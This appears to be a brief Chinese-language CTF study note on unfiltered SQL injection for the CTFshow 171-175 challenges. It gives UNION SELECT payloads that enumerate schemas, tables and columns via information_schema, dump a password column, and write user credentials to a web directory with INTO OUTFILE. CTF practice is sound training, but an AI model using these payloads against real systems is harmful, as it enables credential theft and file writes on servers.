SQL注入-无过滤注入

SQL无过滤注入CTFshow171-175

1' or 1=1 union select 1,database() --+寻找当前库名
1' or 1=1 union select group_concat(schema_name) from information_schema.schemata--+寻找所有库名

1' or 1=1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'--+寻找表名 

-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='ctfshow_web '--+寻找列名

-1' union select 1,2,group_concat(password) from ctfshow_user2--+寻找flag

注意：

• group_concat()将查询结果打包在一起返回，便于观察
• –+表示将之后的内容注释掉，以及其他一些方式注释掉之后内容
• 使用union select需要让前边语句结果为假(-1’)，或者添加’1=1’

例题：

CTFShow174：

CTFShow175:

‘ union select username, password from ctfshow_user5 into outfile ‘/var/www/html/flag.txt’ –+